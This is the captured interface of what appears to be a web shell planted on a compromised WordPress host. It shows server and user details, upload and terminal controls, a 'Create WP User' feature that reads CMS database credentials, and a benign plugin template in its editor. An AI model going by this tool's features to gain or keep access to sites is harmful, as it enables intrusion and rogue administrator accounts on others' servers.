Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
counter-number-showcase
/
templates
/
designs
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
index.php
1.05 KB
-rw-r--r--
2025-10-30 19:02
style.php
1.43 KB
-rw-r--r--
2025-10-30 19:02
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
index.php
<div class="wpsm_row"> <?php foreach($mydemo as $single_data) { $counter_icon = $single_data['counter_icon']; $counter_value = $single_data['counter_value']; $counter_title = $single_data['counter_title']; ?> <div class="wpsm_col-md-<?php echo esc_attr($cn_layout);?> wpsm_col-sm-6"> <div class="wpsm_counterbox"> <?php if($display_icon=="yes"){ ?> <div class="wpsm_count-icon"><i <?php echo esc_html($icon_clr) ;?> class="fa <?php echo esc_attr($counter_icon);?>"></i></div> <?php }?> <div class="wpsm_number" style="<?php echo esc_attr($count_num_clr);?>" > <span class="counter"><?php echo esc_html($counter_value);?> </span> </div> <h3 class="wpsm_count-title" <?php echo esc_html($count_title_clr) ;?>> <?php echo esc_html($counter_title);?></h3> </div> </div> <?php if($i%$cnrow==0){ ?> </div> <div class="wpsm_row"> <?php } ?> <?php $i++; } ?> </div>
关闭
保存